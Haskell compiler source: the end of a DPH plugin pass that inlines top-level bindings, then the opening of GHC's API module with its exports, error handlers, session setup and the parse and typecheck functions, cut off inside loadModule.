summonX tops xx
 = let down = summonX tops
   in case xx of
        -- A variable: if it names one of the module's top-level
        -- (non-recursive) bindings, inline and keep summoning into the copy.
        Var n
         -> trace (renderIndent $ text "look at " <> ppr n)
          $ case lookupBind tops n of
                Nothing -> return xx
                Just x' -> summonX tops x'

        Lit{}           -> return xx
        App x arg       -> liftM2 App (down x) (down arg)
        Lam b x         -> liftM2 Lam (return b) (down x)
        Let bnd x       -> liftM2 Let (summonB tops bnd) (down x)
        Case x b t alts -> liftM4 Case (down x)
                                (return b) (return t)
                                (mapM (summonA tops) alts)
        Cast x co       -> liftM2 Cast (down x) (return co)
        Tick t x        -> liftM2 Tick (return t) (down x)

        -- Types and coercions contain no term-level work to summon.
        Type t          -> return xx
        Coercion co     -> return xx
-- | Summon into a case alternative: the constructor and pattern binders
--   are left untouched; only the result expression is summoned into.
summonA :: [CoreBind]
        -> (AltCon, [CoreBndr], Expr CoreBndr)
        -> CoreM (AltCon, [CoreBndr], Expr CoreBndr)

summonA tops (con, binders, body)
 = liftM (\body' -> (con, binders, body')) (summonX tops body)
-- | Summon into a let-binding.
--
--   For a recursive group we summon into every right-hand side;
--   the binders themselves are unchanged.
summonB :: [CoreBind]           -- ^ All the top-level bindings for this module.
        -> Bind CoreBndr        -- ^ The let-binding to summon into.
        -> CoreM (Bind CoreBndr)

summonB tops bb
 = case bb of
        NonRec b x
         -> liftM2 NonRec (return b) (summonX tops x)

        Rec bxs
         -> do  let (bs, xs) = unzip bxs
                xs' <- mapM (summonX tops) xs
                -- BUG FIX: the summoned right-hand sides (xs') were
                -- previously computed and then discarded -- the group was
                -- rebuilt from the original expressions (xs), so summoning
                -- into recursive lets had no effect.
                return $ Rec $ zip bs xs'
-- | Look up the right-hand side of the named top-level binding,
--   returning the first match (if any).
--
--   Only non-recursive bindings are candidates: recursive groups are
--   deliberately skipped, as summoning into them could diverge.
lookupBind
        :: [CoreBind]
        -> CoreBndr
        -> Maybe (Expr CoreBndr)

lookupBind binds wanted
 = listToMaybe [ x | NonRec b x <- binds, b == wanted ]
| mainland/dph | dph-plugin/DPH/Pass/Summon.hs | bsd-3-clause | 4,672 | 0 | 17 | 1,645 | 1,218 | 613 | 605 | 99 | 11 |
{-# LANGUAGE CPP, NondecreasingIndentation, ScopedTypeVariables #-}
-- -----------------------------------------------------------------------------
--
-- (c) The University of Glasgow, 2005-2012
--
-- The GHC API
--
-- -----------------------------------------------------------------------------
module GHC (
-- * Initialisation
defaultErrorHandler,
defaultCleanupHandler,
prettyPrintGhcErrors,
-- * GHC Monad
Ghc, GhcT, GhcMonad(..), HscEnv,
runGhc, runGhcT, initGhcMonad,
gcatch, gbracket, gfinally,
printException,
handleSourceError,
needsTemplateHaskell,
-- * Flags and settings
DynFlags(..), GeneralFlag(..), Severity(..), HscTarget(..), gopt,
GhcMode(..), GhcLink(..), defaultObjectTarget,
parseDynamicFlags,
getSessionDynFlags, setSessionDynFlags,
getProgramDynFlags, setProgramDynFlags,
getInteractiveDynFlags, setInteractiveDynFlags,
parseStaticFlags,
-- * Targets
Target(..), TargetId(..), Phase,
setTargets,
getTargets,
addTarget,
removeTarget,
guessTarget,
-- * Loading\/compiling the program
depanal,
load, LoadHowMuch(..), InteractiveImport(..),
SuccessFlag(..), succeeded, failed,
defaultWarnErrLogger, WarnErrLogger,
workingDirectoryChanged,
parseModule, typecheckModule, desugarModule, loadModule,
ParsedModule(..), TypecheckedModule(..), DesugaredModule(..),
TypecheckedSource, ParsedSource, RenamedSource, -- ditto
TypecheckedMod, ParsedMod,
moduleInfo, renamedSource, typecheckedSource,
parsedSource, coreModule,
-- ** Compiling to Core
CoreModule(..),
compileToCoreModule, compileToCoreSimplified,
-- * Inspecting the module structure of the program
ModuleGraph, ModSummary(..), ms_mod_name, ModLocation(..),
getModSummary,
getModuleGraph,
isLoaded,
topSortModuleGraph,
-- * Inspecting modules
ModuleInfo,
getModuleInfo,
modInfoTyThings,
modInfoTopLevelScope,
modInfoExports,
modInfoInstances,
modInfoIsExportedName,
modInfoLookupName,
modInfoIface,
modInfoSafe,
lookupGlobalName,
findGlobalAnns,
mkPrintUnqualifiedForModule,
ModIface(..),
SafeHaskellMode(..),
-- * Querying the environment
-- packageDbModules,
-- * Printing
PrintUnqualified, alwaysQualify,
-- * Interactive evaluation
getBindings, getInsts, getPrintUnqual,
findModule, lookupModule,
#ifdef GHCI
isModuleTrusted,
moduleTrustReqs,
setContext, getContext,
getNamesInScope,
getRdrNamesInScope,
getGRE,
moduleIsInterpreted,
getInfo,
exprType,
typeKind,
parseName,
RunResult(..),
runStmt, runStmtWithLocation, runDecls, runDeclsWithLocation,
runTcInteractive, -- Desired by some clients (Trac #8878)
parseImportDecl, SingleStep(..),
resume,
Resume(resumeStmt, resumeThreadId, resumeBreakInfo, resumeSpan,
resumeHistory, resumeHistoryIx),
History(historyBreakInfo, historyEnclosingDecls),
GHC.getHistorySpan, getHistoryModule,
getResumeContext,
abandon, abandonAll,
InteractiveEval.back,
InteractiveEval.forward,
showModule,
isModuleInterpreted,
InteractiveEval.compileExpr, HValue, dynCompileExpr,
GHC.obtainTermFromId, GHC.obtainTermFromVal, reconstructType,
modInfoModBreaks,
ModBreaks(..), BreakIndex,
BreakInfo(breakInfo_number, breakInfo_module),
BreakArray, setBreakOn, setBreakOff, getBreak,
#endif
lookupName,
#ifdef GHCI
-- ** EXPERIMENTAL
setGHCiMonad,
#endif
-- * Abstract syntax elements
-- ** Packages
PackageKey,
-- ** Modules
Module, mkModule, pprModule, moduleName, modulePackageKey,
ModuleName, mkModuleName, moduleNameString,
-- ** Names
Name,
isExternalName, nameModule, pprParenSymName, nameSrcSpan,
NamedThing(..),
RdrName(Qual,Unqual),
-- ** Identifiers
Id, idType,
isImplicitId, isDeadBinder,
isExportedId, isLocalId, isGlobalId,
isRecordSelector,
isPrimOpId, isFCallId, isClassOpId_maybe,
isDataConWorkId, idDataCon,
isBottomingId, isDictonaryId,
recordSelectorFieldLabel,
-- ** Type constructors
TyCon,
tyConTyVars, tyConDataCons, tyConArity,
isClassTyCon, isTypeSynonymTyCon, isTypeFamilyTyCon, isNewTyCon,
isPrimTyCon, isFunTyCon,
isFamilyTyCon, isOpenFamilyTyCon, isOpenTypeFamilyTyCon,
tyConClass_maybe,
synTyConRhs_maybe, synTyConDefn_maybe, synTyConResKind,
-- ** Type variables
TyVar,
alphaTyVars,
-- ** Data constructors
DataCon,
dataConSig, dataConType, dataConTyCon, dataConFieldLabels,
dataConIsInfix, isVanillaDataCon, dataConUserType,
dataConSrcBangs,
StrictnessMark(..), isMarkedStrict,
-- ** Classes
Class,
classMethods, classSCTheta, classTvsFds, classATs,
pprFundeps,
-- ** Instances
ClsInst,
instanceDFunId,
pprInstance, pprInstanceHdr,
pprFamInst,
FamInst,
-- ** Types and Kinds
Type, splitForAllTys, funResultTy,
pprParendType, pprTypeApp,
Kind,
PredType,
ThetaType, pprForAll, pprThetaArrowTy,
-- ** Entities
TyThing(..),
-- ** Syntax
module HsSyn, -- ToDo: remove extraneous bits
-- ** Fixities
FixityDirection(..),
defaultFixity, maxPrecedence,
negateFixity,
compareFixity,
-- ** Source locations
SrcLoc(..), RealSrcLoc,
mkSrcLoc, noSrcLoc,
srcLocFile, srcLocLine, srcLocCol,
SrcSpan(..), RealSrcSpan,
mkSrcSpan, srcLocSpan, isGoodSrcSpan, noSrcSpan,
srcSpanStart, srcSpanEnd,
srcSpanFile,
srcSpanStartLine, srcSpanEndLine,
srcSpanStartCol, srcSpanEndCol,
-- ** Located
GenLocated(..), Located,
-- *** Constructing Located
noLoc, mkGeneralLocated,
-- *** Deconstructing Located
getLoc, unLoc,
-- *** Combining and comparing Located values
eqLocated, cmpLocated, combineLocs, addCLoc,
leftmost_smallest, leftmost_largest, rightmost,
spans, isSubspanOf,
-- * Exceptions
GhcException(..), showGhcException,
-- * Token stream manipulations
Token,
getTokenStream, getRichTokenStream,
showRichTokenStream, addSourceToTokens,
-- * Pure interface to the parser
parser,
-- * API Annotations
ApiAnns,AnnKeywordId(..),AnnotationComment(..),
getAnnotation, getAndRemoveAnnotation,
getAnnotationComments, getAndRemoveAnnotationComments,
-- * Miscellaneous
--sessionHscEnv,
cyclicModuleErr,
) where
{-
ToDo:
* inline bits of HscMain here to simplify layering: hscTcExpr, hscStmt.
* what StaticFlags should we expose, if any?
-}
#include "HsVersions.h"
#ifdef GHCI
import ByteCodeInstr
import BreakArray
import InteractiveEval
import TcRnDriver ( runTcInteractive )
#endif
import PprTyThing ( pprFamInst )
import HscMain
import GhcMake
import DriverPipeline ( compileOne' )
import GhcMonad
import TcRnMonad ( finalSafeMode )
import TcRnTypes
import Packages
import NameSet
import RdrName
import qualified HsSyn -- hack as we want to reexport the whole module
import HsSyn
import Type hiding( typeKind )
import Kind ( synTyConResKind )
import TcType hiding( typeKind )
import Id
import TysPrim ( alphaTyVars )
import TyCon
import Class
import DataCon
import Name hiding ( varName )
import Avail
import InstEnv
import FamInstEnv ( FamInst )
import SrcLoc
import CoreSyn
import TidyPgm
import DriverPhases ( Phase(..), isHaskellSrcFilename )
import Finder
import HscTypes
import DynFlags
import StaticFlags
import SysTools
import Annotations
import Module
import UniqFM
import Panic
import Platform
import Bag ( unitBag )
import ErrUtils
import MonadUtils
import Util
import StringBuffer
import Outputable
import BasicTypes
import Maybes ( expectJust )
import FastString
import qualified Parser
import Lexer
import ApiAnnotation
import System.Directory ( doesFileExist )
import Data.Maybe
import Data.List ( find )
import Data.Time
import Data.Typeable ( Typeable )
import Data.Word ( Word8 )
import Control.Monad
import System.Exit ( exitWith, ExitCode(..) )
import Exception
import Data.IORef
import System.FilePath
import System.IO
import Prelude hiding (init)
-- %************************************************************************
-- %* *
-- Initialisation: exception handlers
-- %* *
-- %************************************************************************
-- | Install some default exception handlers and run the inner computation.
-- Unless you want to handle exceptions yourself, you should wrap this around
-- the top level of your program.  The default handlers output the error
-- message(s) to stderr and exit cleanly.
defaultErrorHandler :: (ExceptionMonad m)
                    => FatalMessager -> FlushOut -> m a -> m a
defaultErrorHandler fm (FlushOut flushOut) inner =
  -- top-level exception handler: any unrecognised exception is a compiler bug.
  ghandle (\exception -> liftIO $ do
           flushOut
           case fromException exception of
                -- an IO exception probably isn't our fault, so don't panic
                Just (ioe :: IOException) ->
                  fatalErrorMsg'' fm (show ioe)
                _ -> case fromException exception of
                     Just UserInterrupt ->
                         -- Important to let this one propagate out so our
                         -- calling process knows we were interrupted by ^C
                         liftIO $ throwIO UserInterrupt
                     Just StackOverflow ->
                         fatalErrorMsg'' fm "stack overflow: use +RTS -K<size> to increase it"
                     _ -> case fromException exception of
                          -- A deliberate exit: re-throw so the exit code survives.
                          Just (ex :: ExitCode) -> liftIO $ throwIO ex
                          _ ->
                              -- Anything else is treated as a panic (GHC bug).
                              fatalErrorMsg'' fm
                                  (show (Panic (show exception)))
           exitWith (ExitFailure 1)
         ) $

  -- error messages propagated as exceptions
  handleGhcException
            (\ge -> liftIO $ do
                flushOut
                case ge of
                     PhaseFailed _ code -> exitWith code
                     Signal _ -> exitWith (ExitFailure 1)
                     _ -> do fatalErrorMsg'' fm (show ge)
                             exitWith (ExitFailure 1)
            ) $

  inner
-- | Install a default cleanup handler to remove temporary files deposited by
-- a GHC run.  This is separate from 'defaultErrorHandler', because you might
-- want to override the error handling, but still get the ordinary cleanup
-- behaviour.
defaultCleanupHandler :: (ExceptionMonad m) =>
                         DynFlags -> m a -> m a
defaultCleanupHandler dflags inner =
    -- make sure we clean up after ourselves
    -- (gfinally runs the cleanup whether 'inner' succeeds or throws)
    inner `gfinally`
          (liftIO $ do
              cleanTempFiles dflags
              cleanTempDirs dflags
          )
          --  exceptions will be blocked while we clean the temporary files,
          -- so there shouldn't be any difficulty if we receive further
          -- signals.
-- %************************************************************************
-- %* *
-- The Ghc Monad
-- %* *
-- %************************************************************************
-- | Run function for the 'Ghc' monad.
--
-- It initialises the GHC session and warnings via 'initGhcMonad'.  Each call
-- to this function will create a new session which should not be shared among
-- several threads.
--
-- Any errors not handled inside the 'Ghc' action are propagated as IO
-- exceptions.
runGhc :: Maybe FilePath  -- ^ See argument to 'initGhcMonad'.
       -> Ghc a           -- ^ The action to perform.
       -> IO a
runGhc mb_top_dir ghc = do
  -- The session ref is filled in by initGhcMonad; forcing it before
  -- then is a bug, hence the panic placeholder.
  ref <- newIORef (panic "empty session")
  let session = Session ref
  flip unGhc session $ do
    initGhcMonad mb_top_dir
    ghc
  -- XXX: unregister interrupt handlers here?
-- | Run function for 'GhcT' monad transformer.
--
-- It initialises the GHC session and warnings via 'initGhcMonad'.  Each call
-- to this function will create a new session which should not be shared among
-- several threads.

#if __GLASGOW_HASKELL__ < 710
-- Pre-AMP change
runGhcT :: (ExceptionMonad m, Functor m) =>
#else
runGhcT :: (ExceptionMonad m) =>
#endif
           Maybe FilePath  -- ^ See argument to 'initGhcMonad'.
        -> GhcT m a        -- ^ The action to perform.
        -> m a
runGhcT mb_top_dir ghct = do
  -- Placeholder session; initGhcMonad fills it in before any use.
  ref <- liftIO $ newIORef (panic "empty session")
  let session = Session ref
  flip unGhcT session $ do
    initGhcMonad mb_top_dir
    ghct
-- | Initialise a GHC session.
--
-- If you implement a custom 'GhcMonad' you must call this function in the
-- monad run function.  It will initialise the session variable and clear all
-- warnings.
--
-- The first argument should point to the directory where GHC's library files
-- reside.  More precisely, this should be the output of @ghc --print-libdir@
-- of the version of GHC the module using this API is compiled with.  For
-- portability, you should use the @ghc-paths@ package, available at
-- <http://hackage.haskell.org/package/ghc-paths>.

initGhcMonad :: GhcMonad m => Maybe FilePath -> m ()
initGhcMonad mb_top_dir
  = do { env <- liftIO $
             do { installSignalHandlers  -- catch ^C
                ; initStaticOpts
                ; mySettings <- initSysTools mb_top_dir
                ; dflags <- initDynFlags (defaultDynFlags mySettings)
                -- Refuse to start on platforms where the linker is known
                -- to break tables-next-to-code (see below).
                ; checkBrokenTablesNextToCode dflags
                ; setUnsafeGlobalDynFlags dflags
                   -- c.f. DynFlags.parseDynamicFlagsFull, which
                   -- creates DynFlags and sets the UnsafeGlobalDynFlags
                ; newHscEnv dflags }
       ; setSession env }
-- | The binutils linker on ARM emits unnecessary R_ARM_COPY relocations which
-- breaks tables-next-to-code in dynamically linked modules. This
-- check should be more selective but there is currently no released
-- version where this bug is fixed.
-- See https://sourceware.org/bugzilla/show_bug.cgi?id=16177 and
-- https://ghc.haskell.org/trac/ghc/ticket/4210#comment:29
checkBrokenTablesNextToCode :: MonadIO m => DynFlags -> m ()
checkBrokenTablesNextToCode dflags
  = do { broken <- checkBrokenTablesNextToCode' dflags
       ; when broken
         -- Throw an ApiErr so API clients see a structured error before
         -- the fail below aborts the computation.
         $ do { _ <- liftIO $ throwIO $ mkApiErr dflags invalidLdErr
              ; fail "unsupported linker"
              }
       }
  where
    invalidLdErr = text "Tables-next-to-code not supported on ARM" <+>
                   text "when using binutils ld (please see:" <+>
                   text "https://sourceware.org/bugzilla/show_bug.cgi?id=16177)"
-- | Returns True only when all of the following hold: the target is ARM,
-- we are building a dynamic way, tables-next-to-code is enabled, and the
-- linker in use is GNU ld (the combination known to be broken).
checkBrokenTablesNextToCode' :: MonadIO m => DynFlags -> m Bool
checkBrokenTablesNextToCode' dflags
  | not (isARM arch)              = return False
  | WayDyn `notElem` ways dflags  = return False
  | not (tablesNextToCode dflags) = return False
  | otherwise                     = do
    -- Only probe the linker when the cheap checks above all pass.
    linkerInfo <- liftIO $ getLinkerInfo dflags
    case linkerInfo of
      GnuLD _ -> return True
      _       -> return False
  where platform = targetPlatform dflags
        arch = platformArch platform
-- %************************************************************************
-- %* *
-- Flags & settings
-- %* *
-- %************************************************************************
-- $DynFlags
--
-- The GHC session maintains two sets of 'DynFlags':
--
-- * The "interactive" @DynFlags@, which are used for everything
-- related to interactive evaluation, including 'runStmt',
-- 'runDecls', 'exprType', 'lookupName' and so on (everything
-- under \"Interactive evaluation\" in this module).
--
-- * The "program" @DynFlags@, which are used when loading
-- whole modules with 'load'
--
-- 'setInteractiveDynFlags', 'getInteractiveDynFlags' work with the
-- interactive @DynFlags@.
--
-- 'setProgramDynFlags', 'getProgramDynFlags' work with the
-- program @DynFlags@.
--
-- 'setSessionDynFlags' sets both @DynFlags@, and 'getSessionDynFlags'
-- retrieves the program @DynFlags@ (for backwards compatibility).
-- | Updates both the interactive and program DynFlags in a Session.
-- This also reads the package database (unless it has already been
-- read), and prepares the compilers knowledge about packages.  It can
-- be called again to load new packages: just add new package flags to
-- (packageFlags dflags).
--
-- Returns a list of new packages that may need to be linked in using
-- the dynamic linker (see 'linkPackages') as a result of new package
-- flags.  If you are not doing linking or doing static linking, you
-- can ignore the list of packages returned.
--
setSessionDynFlags :: GhcMonad m => DynFlags -> m [PackageKey]
setSessionDynFlags dflags = do
  (dflags', preload) <- liftIO $ initPackages dflags
  -- Update both the program flags (hsc_dflags) and the interactive
  -- context's copy, keeping the two in sync.
  modifySession $ \h -> h{ hsc_dflags = dflags'
                         , hsc_IC = (hsc_IC h){ ic_dflags = dflags' } }
  invalidateModSummaryCache
  return preload
-- | Sets the program 'DynFlags'.  Unlike 'setSessionDynFlags' this leaves
-- the interactive flags untouched.  Also (re)initialises the package state
-- and returns any packages that may need linking.
setProgramDynFlags :: GhcMonad m => DynFlags -> m [PackageKey]
setProgramDynFlags dflags = do
  (dflags', preload) <- liftIO $ initPackages dflags
  modifySession $ \h -> h{ hsc_dflags = dflags' }
  -- Cached ModSummaries embed the old flags; invalidate them (see below).
  invalidateModSummaryCache
  return preload
-- When changing the DynFlags, we want the changes to apply to future
-- loads, but without completely discarding the program.  But the
-- DynFlags are cached in each ModSummary in the hsc_mod_graph, so
-- after a change to DynFlags, the changes would apply to new modules
-- but not existing modules; this seems undesirable.
--
-- Furthermore, the GHC API client might expect that changing
-- log_action would affect future compilation messages, but for those
-- modules we have cached ModSummaries for, we'll continue to use the
-- old log_action.  This is definitely wrong (#7478).
--
-- Hence, we invalidate the ModSummary cache after changing the
-- DynFlags.  We do this by tweaking the date on each ModSummary, so
-- that the next downsweep will think that all the files have changed
-- and preprocess them again.  This won't necessarily cause everything
-- to be recompiled, because by the time we check whether we need to
-- recopmile a module, we'll have re-summarised the module and have a
-- correct ModSummary.
--
invalidateModSummaryCache :: GhcMonad m => m ()
invalidateModSummaryCache =
  modifySession $ \h -> h { hsc_mod_graph = map inval (hsc_mod_graph h) }
 where
  -- Pretend each source file is one second older than recorded, forcing
  -- re-summarisation on the next downsweep.
  inval ms = ms { ms_hs_date = addUTCTime (-1) (ms_hs_date ms) }
-- | Returns the program 'DynFlags'.
-- (Same as 'getSessionDynFlags', kept for API symmetry with
-- 'setProgramDynFlags'.)
getProgramDynFlags :: GhcMonad m => m DynFlags
getProgramDynFlags = getSessionDynFlags
-- | Set the 'DynFlags' used to evaluate interactive expressions.
-- Note: this cannot be used for changes to packages.  Use
-- 'setSessionDynFlags', or 'setProgramDynFlags' and then copy the
-- 'pkgState' into the interactive @DynFlags@.
setInteractiveDynFlags :: GhcMonad m => DynFlags -> m ()
setInteractiveDynFlags dflags = do
  -- Only the interactive context's flags are touched.
  modifySession $ \h -> h{ hsc_IC = (hsc_IC h) { ic_dflags = dflags }}
-- | Get the 'DynFlags' used to evaluate interactive expressions.
getInteractiveDynFlags :: GhcMonad m => m DynFlags
getInteractiveDynFlags = withSession $ \h -> return (ic_dflags (hsc_IC h))
-- | Parse command-line dynamic flags.  Returns the updated 'DynFlags',
-- the leftover (unparsed) arguments, and any warnings produced.
parseDynamicFlags :: MonadIO m =>
                     DynFlags -> [Located String]
                  -> m (DynFlags, [Located String], [Located String])
parseDynamicFlags = parseDynamicFlagsCmdLine
-- %************************************************************************
-- %* *
-- Setting, getting, and modifying the targets
-- %* *
-- %************************************************************************
-- ToDo: think about relative vs. absolute file paths. And what
-- happens when the current directory changes.
-- | Sets the targets for this session.  Each target may be a module name
-- or a filename.  The targets correspond to the set of root modules for
-- the program\/library.  Unloading the current program is achieved by
-- setting the current set of targets to be empty, followed by 'load'.
setTargets :: GhcMonad m => [Target] -> m ()
setTargets targets = modifySession (\h -> h{ hsc_targets = targets })
-- | Returns the current set of targets
getTargets :: GhcMonad m => m [Target]
getTargets = withSession (return . hsc_targets)
-- | Add another target.  The new target is prepended; no de-duplication
-- is performed against existing targets.
addTarget :: GhcMonad m => Target -> m ()
addTarget target
  = modifySession (\h -> h{ hsc_targets = target : hsc_targets h })
-- | Remove a target.  All targets whose 'TargetId' matches the given one
-- are dropped from the session; others are kept in order.
removeTarget :: GhcMonad m => TargetId -> m ()
removeTarget target_id
  = modifySession (\h -> h{ hsc_targets = keep (hsc_targets h) })
  where
    -- Keep every target whose identifier differs from the one being
    -- removed.  (Renamed from the original's local "filter"/"id", which
    -- shadowed the Prelude names.)
    keep targets = [ t | t@(Target tid _ _) <- targets, tid /= target_id ]
-- | Attempts to guess what Target a string refers to.  This function
-- implements the @--make@/GHCi command-line syntax for filenames:
--
--   - if the string looks like a Haskell source filename, then interpret it
--     as such
--
--   - if adding a .hs or .lhs suffix yields the name of an existing file,
--     then use that
--
--   - otherwise interpret the string as a module name
--
guessTarget :: GhcMonad m => String -> Maybe Phase -> m Target
guessTarget str (Just phase)
   = return (Target (TargetFile str (Just phase)) True Nothing)
guessTarget str Nothing
   | isHaskellSrcFilename file
   = return (target (TargetFile file Nothing))
   | otherwise
   = do exists <- liftIO $ doesFileExist hs_file
        if exists
           then return (target (TargetFile hs_file Nothing))
           else do
        exists <- liftIO $ doesFileExist lhs_file
        if exists
           then return (target (TargetFile lhs_file Nothing))
           else do
        if looksLikeModuleName file
           then return (target (TargetModule (mkModuleName file)))
           else do
        dflags <- getDynFlags
        liftIO $ throwGhcExceptionIO
                 (ProgramError (showSDoc dflags $
                 text "target" <+> quotes (text file) <+>
                 text "is not a module name or a source file"))
     where
         -- A leading '*' means "interpret this target, never use the
         -- object file" (GHCi syntax); strip it and record the flag.
         (file,obj_allowed)
                | '*':rest <- str = (rest, False)
                | otherwise       = (str, True)

         hs_file  = file <.> "hs"
         lhs_file = file <.> "lhs"

         target tid = Target tid obj_allowed Nothing
-- | Inform GHC that the working directory has changed.  GHC will flush
-- its cache of module locations, since it may no longer be valid.
--
-- Note: Before changing the working directory make sure all threads running
-- in the same session have stopped.  If you change the working directory,
-- you should also unload the current program (set targets to empty,
-- followed by load).
workingDirectoryChanged :: GhcMonad m => m ()
workingDirectoryChanged = withSession $ (liftIO . flushFinderCaches)
-- %************************************************************************
-- %* *
-- Running phases one at a time
-- %* *
-- %************************************************************************
-- | Things that carry (at least) a parse result: a 'ModSummary' and the
-- parsed syntax tree.
class ParsedMod m where
  modSummary   :: m -> ModSummary
  parsedSource :: m -> ParsedSource
-- | Things that additionally carry a typecheck result.
class ParsedMod m => TypecheckedMod m where
  renamedSource     :: m -> Maybe RenamedSource
  typecheckedSource :: m -> TypecheckedSource
  moduleInfo        :: m -> ModuleInfo
  tm_internals      :: m -> (TcGblEnv, ModDetails)
        -- ToDo: improvements that could be made here:
        --  if the module succeeded renaming but not typechecking,
        --  we can still get back the GlobalRdrEnv and exports, so
        --  perhaps the ModuleInfo should be split up into separate
        --  fields.
-- | Things that additionally carry a desugar result (Core).
class TypecheckedMod m => DesugaredMod m where
  coreModule :: m -> ModGuts
-- | The result of successful parsing.
data ParsedModule =
  ParsedModule { pm_mod_summary   :: ModSummary
               , pm_parsed_source :: ParsedSource
               , pm_extra_src_files :: [FilePath]
               , pm_annotations :: ApiAnns }
               -- See Note [Api annotations] in ApiAnnotation.hs

instance ParsedMod ParsedModule where
  modSummary m    = pm_mod_summary m
  parsedSource m  = pm_parsed_source m
-- | The result of successful typechecking.  It also contains the parser
--   result.
data TypecheckedModule =
  TypecheckedModule { tm_parsed_module       :: ParsedModule
                    , tm_renamed_source      :: Maybe RenamedSource
                    , tm_typechecked_source  :: TypecheckedSource
                    , tm_checked_module_info :: ModuleInfo
                    , tm_internals_          :: (TcGblEnv, ModDetails)
                    }

instance ParsedMod TypecheckedModule where
  modSummary m   = modSummary (tm_parsed_module m)
  parsedSource m = parsedSource (tm_parsed_module m)

instance TypecheckedMod TypecheckedModule where
  renamedSource m     = tm_renamed_source m
  typecheckedSource m = tm_typechecked_source m
  moduleInfo m        = tm_checked_module_info m
  tm_internals m      = tm_internals_ m
-- | The result of successful desugaring (i.e., translation to core).  Also
--   contains all the information of a typechecked module.
data DesugaredModule =
  DesugaredModule { dm_typechecked_module :: TypecheckedModule
                  , dm_core_module        :: ModGuts
                  }

-- All accessors simply delegate to the embedded TypecheckedModule.
instance ParsedMod DesugaredModule where
  modSummary m   = modSummary (dm_typechecked_module m)
  parsedSource m = parsedSource (dm_typechecked_module m)

instance TypecheckedMod DesugaredModule where
  renamedSource m     = renamedSource (dm_typechecked_module m)
  typecheckedSource m = typecheckedSource (dm_typechecked_module m)
  moduleInfo m        = moduleInfo (dm_typechecked_module m)
  tm_internals m      = tm_internals_ (dm_typechecked_module m)

instance DesugaredMod DesugaredModule where
  coreModule m = dm_core_module m
-- | Syntax tree produced by the parser (located 'HsModule' over 'RdrName').
type ParsedSource      = Located (HsModule RdrName)
-- | Output of the renamer: declaration groups, imports, export list and
-- the module haddock header, all over resolved 'Name's.
type RenamedSource     = (HsGroup Name, [LImportDecl Name], Maybe [LIE Name],
                          Maybe LHsDocString)
-- | Output of the typechecker: the (zonked) bindings over 'Id's.
type TypecheckedSource = LHsBinds Id
-- NOTE:
-- - things that aren't in the output of the typechecker right now:
-- - the export list
-- - the imports
-- - type signatures
-- - type/data/newtype declarations
-- - class declarations
-- - instances
-- - extra things in the typechecker's output:
-- - default methods are turned into top-level decls.
-- - dictionary bindings
-- | Return the 'ModSummary' of a module with the given name.
--
-- The module must be part of the module graph (see 'hsc_mod_graph' and
-- 'ModuleGraph').  If this is not the case, this function will throw a
-- 'GhcApiError'.
--
-- This function ignores boot modules and requires that there is only one
-- non-boot module with the given name.
getModSummary :: GhcMonad m => ModuleName -> m ModSummary
getModSummary mod = do
   mg <- liftM hsc_mod_graph getSession
   -- Filter out boot summaries; anything other than exactly one match
   -- is an API error.
   case [ ms | ms <- mg, ms_mod_name ms == mod, not (isBootSummary ms) ] of
     [] -> do dflags <- getDynFlags
              liftIO $ throwIO $ mkApiErr dflags (text "Module not part of module graph")
     [ms] -> return ms
     multiple -> do dflags <- getDynFlags
                    liftIO $ throwIO $ mkApiErr dflags (text "getModSummary is ambiguous: " <+> ppr multiple)
-- | Parse a module.
--
-- Throws a 'SourceError' on parse error.
parseModule :: GhcMonad m => ModSummary -> m ParsedModule
parseModule ms = do
   hsc_env <- getSession
   -- Use the module's own preprocessed options for this compilation.
   let hsc_env_tmp = hsc_env { hsc_dflags = ms_hspp_opts ms }
   hpm <- liftIO $ hscParse hsc_env_tmp ms
   return (ParsedModule ms (hpm_module hpm) (hpm_src_files hpm)
                           (hpm_annotations hpm))
               -- See Note [Api annotations] in ApiAnnotation.hs
-- See Note [Api annotations] in ApiAnnotation.hs
-- | Typecheck and rename a parsed module.
--
-- Throws a 'SourceError' if either fails.
typecheckModule :: GhcMonad m => ParsedModule -> m TypecheckedModule
typecheckModule pmod = do
 let ms = modSummary pmod
 hsc_env <- getSession
 -- Typecheck under the module's own preprocessed options.
 let hsc_env_tmp = hsc_env { hsc_dflags = ms_hspp_opts ms }
 (tc_gbl_env, rn_info)
       <- liftIO $ hscTypecheckRename hsc_env_tmp ms $
                      HsParsedModule { hpm_module = parsedSource pmod,
                                       hpm_src_files = pm_extra_src_files pmod,
                                       hpm_annotations = pm_annotations pmod }
 details <- liftIO $ makeSimpleDetails hsc_env_tmp tc_gbl_env
 -- Compute the final Safe Haskell mode from the options and typecheck result.
 safe    <- liftIO $ finalSafeMode (ms_hspp_opts ms) tc_gbl_env

 return $
     TypecheckedModule {
       tm_internals_          = (tc_gbl_env, details),
       tm_parsed_module       = pmod,
       tm_renamed_source      = rn_info,
       tm_typechecked_source  = tcg_binds tc_gbl_env,
       tm_checked_module_info =
         ModuleInfo {
           minf_type_env  = md_types details,
           minf_exports   = availsToNameSet $ md_exports details,
           minf_rdr_env   = Just (tcg_rdr_env tc_gbl_env),
           minf_instances = md_insts details,
           minf_iface     = Nothing,
           minf_safe      = safe
#ifdef GHCI
          ,minf_modBreaks = emptyModBreaks
#endif
         }}
-- | Desugar a typechecked module.
desugarModule :: GhcMonad m => TypecheckedModule -> m DesugaredModule
desugarModule tcm = do
 let ms = modSummary tcm
 let (tcg, _) = tm_internals tcm
 hsc_env <- getSession
 -- Desugar under the module's own preprocessed options.
 let hsc_env_tmp = hsc_env { hsc_dflags = ms_hspp_opts ms }
 guts <- liftIO $ hscDesugar hsc_env_tmp ms tcg
 return $
     DesugaredModule {
       dm_typechecked_module = tcm,
       dm_core_module        = guts
     }
-- | Load a module.  Input doesn't need to be desugared.
--
-- A module must be loaded before dependent modules can be typechecked.  This
-- always includes generating a 'ModIface' and, depending on the
-- 'DynFlags.hscTarget', may also include code generation.
--
-- This function will always cause recompilation and will always overwrite
-- previous compilation results (potentially files on disk).
--
loadModule :: (TypecheckedMod mod, GhcMonad m) => mod -> m mod
loadModule tcm = do
   let ms = modSummary tcm
   let mod = ms_mod_name ms
   let loc = ms_location ms
   let (tcg, _details) = tm_internals tcm

   -- Reuse an existing object file only if it is newer than the source.
   mb_linkable <- case ms_obj_date ms of
                     Just t | t > ms_hs_date ms  -> do
                         l <- liftIO $ findObjectLinkable (ms_mod ms)
                                                  (ml_obj_file loc) t
                         return (Just l)
                     _otherwise -> return Nothing

   let source_modified | isNothing mb_linkable = SourceModified
                       | otherwise             = SourceUnmodified
                       -- we can't determine stability here

   -- compile doesn't change the session
